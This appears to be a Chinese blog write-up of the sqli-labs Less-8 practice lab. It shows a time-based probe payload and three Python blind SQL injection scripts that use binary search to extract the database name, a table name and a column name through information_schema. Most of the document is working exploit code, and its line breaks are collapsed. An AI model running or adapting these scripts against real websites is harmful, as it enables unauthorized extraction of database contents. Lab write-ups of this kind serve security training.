一、先盲注判断
?id=1' and sleep(2)--+
如果发现页面存在注点,使用时间盲注脚本进行注入
import requestsdef inject_database(url):name = ''for i in range(1, 20): # 假设数据库名称长度不超过20low = 48 # '0'high = 122 # 'z'middle = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)params = {"id": payload}r = requests.get(url, params=params)# 判断注入是否成功,依据靶场的返回信息if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功low = middle + 1else:high = middlemiddle = (low + high) // 2# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符if middle > 32: # 跳过空格和不可打印字符name += chr(middle)# 每次获取一个字符后打印当前的数据库名print(f"Current database name: {name}")# 重置 low 和 high 的值low = 48high = 122middle = (low + high) // 2print(f"Final database name: {name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"inject_database(url)
成功注入出了数据库名。
二、更换payload和部分函数代码注入表和列
import requestsdef inject_table_name(url, database_name):table_name = ''for i in range(1, 20): # 假设表名长度不超过20low = 48 # '0'high = 122 # 'z'middle = (low + high) // 2while low < high:# 构造布尔盲注的 payloadpayload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "params = {"id": payload}r = requests.get(url, params=params)# 判断注入是否成功,依据靶场的返回信息if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功low = middle + 1else:high = middlemiddle = (low + high) // 2# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符if middle > 32: # 跳过空格和不可打印字符table_name += chr(middle)# 每次获取一个字符后打印当前的表名print(table_name)# 重置 low 和 high 的值low = 48high = 122middle = (low + high) // 2print(f"Final table name: {table_name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php" database_name = "security" # 目标数据库名称inject_table_name(url, database_name)
列名注入
import requestsdef inject_column_name(url, database_name, table_name):column_name = ''for i in range(1, 20): # 假设列名长度不超过20low = 48 # '0'high = 122 # 'z'middle = (low + high) // 2while low < high:# 构造布尔盲注的 payloadpayload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "params = {"id": payload}r = requests.get(url, params=params)# 判断注入是否成功,依据靶场的返回信息if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功low = middle + 1else:high = middlemiddle = (low + high) // 2# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符if middle > 32: # 跳过空格和不可打印字符column_name += chr(middle)# 每次获取一个字符后打印当前的列名print(column_name)# 重置 low 和 high 的值low = 48high = 122middle = (low + high) // 2print(f"Final column name: {column_name}")if __name__ == "__main__":url = "http://127.0.0.1/sqlilabs7/Less-8/index.php" database_name = "security" # 目标数据库名称table_name = "users" # 目标表名inject_column_name(url, database_name, table_name)
![BUU37 [DASCTF X GFCTF 2024|四月开启第一局]web1234【代码审计/序列化/RCE】](https://i-blog.csdnimg.cn/direct/2a983ecc107541a19ff3b7c582439b3a.png)
